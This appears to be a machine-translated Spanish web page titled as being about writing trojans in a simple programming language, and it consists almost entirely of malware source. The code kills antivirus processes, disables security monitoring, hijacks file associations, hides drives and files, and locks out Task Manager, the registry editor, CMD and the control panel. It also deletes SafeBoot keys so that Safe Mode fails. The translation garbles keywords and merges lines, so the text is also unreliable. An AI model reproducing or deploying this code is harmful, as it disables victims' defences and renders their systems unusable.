El significado de escribir programas de código troyano utilizando un lenguaje de programación sencillo
run("taskkill /f /im kavsvc.exe", false, 1)
run("taskkill /f /im KVXP.kxp", false, 1) p>
p>
run("taskkill /f /im Ravmon.exe", false, 1)
run("taskkill /f /im Ravmon.exe", false, 1 )
run("taskkill /f /im Mcshield.exe", falso, 1)
run("taskkill /f /im VsTskMgr.exe", falso, 1)
Escribir clave de registro (4, "SOFTWARE\360Safe\safemon\ExecAccess", 0)
Escribir clave de registro (4, "SOFTWARE\360Safe\safemon\MonAccess", 0)
Escribir elementos de registro (4, "SOFTWARE\360Safe\safemon\SiteAccess", 0)
Escribir elementos de registro (4, "SOFTWARE\360Safe\safemon\UDiskAccess", 0)
Ejecutar ("taskkill /f /im 360tray.exe", false, 1) 'Finalizar proceso 360
' Modificar asociación
Escribir elemento de registro (1, ".txt\", "jpegfile")
Escriba el elemento de registro (1, ".inf\", "jpegfile")Escriba el elemento de registro (4, "SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder\Hidden \SHOWALL\CheckedValue", 0) 'Ocultar archivos y carpetas
Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0 ) 'Deshabilitar Administrador de Tareas
Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", 1) 'Deshabilitar Panel de Control
Escribir clave de registro (3, "Software \Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools", 1) ' Deshabilitar registro
Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ NoRun", 1 ) 'Oculta la ejecución en Inicio y prohíbe que WIN2000/XP cree una nueva tarea a través del Administrador de tareas y escriba la clave de registro (3, "SoftWare\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled", 1 )
' Ocultar unidades de disco en "modo MS-DOS".
No se puede ver en "Mi PC" ni en modo "MS-DOS"
Escriba la clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 4294967295)' Ocultar todas las unidades
Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", 4294967295) 'Deshabilitar todas las unidades
Escribir entrada de registro (3 , "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1) 'Ocultar opciones de carpeta
Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoDesktop ", 1) 'Ocultar el objeto del escritorio
Escribe la clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1) 'Ocultar el inicio Apagar
Escribir entrada de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", 1) 'Ocultar búsqueda en inicio
' Escribir entrada de registro ( 3. "Software\ Policies\Microsoft\Windows\System\DisableCMD", 1)'1 Deshabilitar archivos CMD y .BAT 2 Deshabilitar CMD pero no .BAT 0 Habilitar ambos elementos
Escriba el elemento de registro (3, " Software\Policies \Microsoft\Internet Explorer\Control Panel\HomePage", 1) 'Ocultar grupo de opciones de página de inicio
Escribir clave de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu", 1) 'Ocultar menú de archivos de IE
Escribir elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites", 1) 'Ocultar menú de favoritos
Escribir el elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting", 1) 'Desactivar la función de impresión de IE
Escriba el elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer \Restrictions \NoBrowserOptions", 1) 'Ocultar opciones de Internet
Escribir entrada de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource", 1) 'Prohibir
EVer el archivo fuente
Escribir el elemento de registro (3, "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803", 3) 'Desactivar la función de descarga de IE
Escribir elemento de registro (3, "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu", 1) ' Deshabilitar el menú contextual del botón derecho
Escribir elemento de registro (3, "Software\Microsoft\Windows \CurrentVersion\ Policies\Explorer\NoRealMode", 1) ' Deshabilite "Reiniciar la computadora para cambiar al modo MS-DOS" para escribir la entrada del registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", 1) ' Deshabilitar la visualización del elemento de registro de escritura " "Cerrar sesión" (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu", 1) ' Deshabilitar el menú de documentos para escribir el elemento de registro (3, "Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer\NoLogOff" ", 1) ' Elimina el elemento "Iniciar sesión" en el menú "Inicio" y escribe elementos de registro (3, "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", 1) ' Desactivar el uso del botón derecho del ratón para escribir elementos de registro (3 , "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders", 1) 'Prohibir modificación del panel de control
.Versión 2 ' No se puede ingresar al modo seguro
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\")
Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\ Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\")
Elimine la entrada de registro (4, “SYSTEM\ CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318 }\")
Elimine el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969- E325-11CE-BFC1-08002BE10318}\”)
Eliminar clave de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002
BE10318}\”)
Elimine el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\")
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\ Control \SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\")
Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325- 11CE- BFC1-08002BE10318}\”)
Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”) p>
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\")
Eliminar elementos de registro (4, " SYSTEM\CurrentControlSet \Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\")
Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{ 745A17A0-74D3- 11D0-B6FE-00A0C90F57DA}\”)
Eliminar el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\”)
Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base\")
Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\ ")
Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\")
Eliminar el elemento de registro (4, "SYSTEM\ CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc \")
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\")
Eliminar elementos de registro (4, "SISTEMA\Actual
entControlSet\Control\SafeBoot\Minimal\dmadmin\”)
Elimine la entrada de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\”)
Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\")
Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys \ ")
Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\")
Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet \Control\ SafeBoot\Minimal\EventLog\”)
Eliminar el elemento de registro (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system\”)
Eliminar el elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter\")
Elimine la entrada de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\")
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\")
Eliminar elementos de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal \PCI Configuration\")
Eliminar elemento de registro (4, "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay")
Destroy()